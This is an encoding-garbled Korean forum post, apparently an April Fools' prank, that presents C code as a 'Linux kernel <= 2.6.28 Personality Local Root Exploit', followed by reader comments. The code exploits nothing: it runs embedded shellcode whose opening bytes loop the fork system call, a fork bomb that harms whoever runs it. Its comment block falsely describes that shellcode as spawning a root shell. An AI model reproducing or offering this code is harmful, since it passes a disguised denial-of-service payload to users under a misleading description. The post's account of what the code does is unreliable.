|
|
|
|
|
|
| | Name : | chpie | | Day : | 2009.04.01 09:58:23 |
Subject : |
¿Í ¸®´ª½º ´ë¹Ú ¹ö±× ¶¸³×¿© |
ÀÏ´Ü Á¦°¡ ·Î±×ÀÎ °¡´ÉÇÑ ¼¹ö´Â ¿Ø¸¸ÇÑ°Ç ¹Ù·Î Åи®³×¿© -_-;;
¾î¶»°Ô ÀÛµ¿Çϴ°ÇÁö ´çÃé..
/*
*
* Linux kernel <= 2.6.28 Personality Local Root Exploit
*
* Crafted by H4wa1[gmai1_dot_com]
*
* compile option
*
* gcc hawai.c -o hawai -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack -fomit-frame-pointer -Wnon-virtual-dtor -W -Wall -Wpacked -feliminate-dwarf2-dups -ffloat-store -fearly-inlining -ftree-salias
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
char shellcode[] = "\x6a\x02\x58\xcd\x80\xeb\xf9"
"\x6a\x05\x58\x99\x52\x68\x74\x79\x31\x30\x68\x2f\x2f\x2f\x74"
"\x68\x2f\x64\x65\x76\x89\xe3\x89\xd1\xcd\x80\x89\xc3\x6a\x36"
"\x58\xb9\xcf\xb4\xff\xff\xf7\xd1\xba\xdc\x34\xfa\x03\xcd\x80";
/*
* setreuid(0, 0);
* push byte +0x46
* pop eax
* xor ebx,ebx
* xor ecx,ecx
* int 0x80
*
* execve("/bin//sh", ["/bin//sh", "-c", "cmd"], NULL);
* jmp short 0x2c
* pop edi
* push byte +0xb
* pop eax
* cdq
* push edx
* push word 0x632d
* mov esi,esp
* push edx
* push dword 0x68732f2f
* push dword 0x6e69622f
* mov ebx,esp
* push edx
* push edi
* push esi
* push ebx
* mov ecx,esp
* int 0x80
* call 0xb
* "cmd; exit;"
*/
int main(int argc, char * argv[])
{
char buffer[1024];
int loop, ret;
if (argc == 1){
printf("using default target program :: /bin/ls\n");
strcpy(buffer, "/bin/ls");
}
strcpy(buffer,argv[1]);
memset(buffer,0x90,1024);
void (*b)()=shellcode;b();
for (loop=0;loop<0x10000;loop++){
ret = personality(b);
if (ret==-71393){
//
// hellcode injection
//
memset(buffer, 0x90, 1024);
buffer[ret - 0xa8 + loop / 2 * 39] =
buffer[ret - 0xfb * sizeof(long)];
printf("Yay!! !!");
exit(0);
}
}
printf("Fail.\n");
return 0;
}
|
|
| 04.01 10:10 | ashine | Å·¿Õ¯ ¹ö±×±º ¤»¤» -»èÁ¦ | | 04.01 10:46 | n0fate | ¿À Á¦ ¸®´ª½º ¼¹ö¿¡ Å×½ºÆ®Çغ¸´Ï±ñ ¹Ù·Î ¶Õ¸®³×¿ä..Å«Àϳµí. -»èÁ¦ | | 04.01 11:31 | passket | -¤±- -»èÁ¦ | | 04.01 11:53 | passket | ³¬Àΰǰ¡ -_-;;;;;;;;;;;;;;;;;;;;; -»èÁ¦ | | 04.01 11:57 | beist | ¿¶ó À§ÇèÇϱº.. -»èÁ¦ | | 04.01 13:32 | saintrole | ...±¸±Û½Åµµ ¸ð¸£´Â... -»èÁ¦ | | 04.01 14:51 | binish | chpie, ÀÏ·ç Á» ¿Ã·¡? ^^ -»èÁ¦ | | 04.01 15:52 | newpolaris | ¤Ô¤±¤Í¤·¹Ì? -»èÁ¦ | | 04.01 22:52 | hahah | ¹¹ÁÒ? ¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù³ª´Âµ¥..-_-; -»èÁ¦ | | 04.02 00:09 | chpie | ÇÏ¿ÍÀÌ¿¡ ´Ù³à¿À½Å ºÐµéÀÌ ²Ï ÀÖ±º¿ä.. ¤»¤»¤» -»èÁ¦ | | 04.02 07:48 | minias | ÀÌ°Å ¸¸¿ìÀý ÄÚµåÀε¥ ÁøÂ¥ ¶Ô¸®´Â ¸®´ª½º´Â ¹¹Áö ¤Ñ¤Ñ; -»èÁ¦ | | 04.02 15:18 | n0fate | Á¦ ´ñ±ÛÀÌ È¿°ú¸¦ Á» ºÃ³ª¿ä..-_+; -»èÁ¦ | | 04.02 16:34 | zemisolsol | ¤»¤»¤»¤»¤»¤»¤»¤»¤» -»èÁ¦ | | 04.03 17:43 | guk | ¤»¤» Àúµµ ¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù -»èÁ¦ | |
|REPLY| |MODIFY| |DELETE| |LIST|
|
Copyright ¨Ï 2010 beistlab. All rights reserved |
|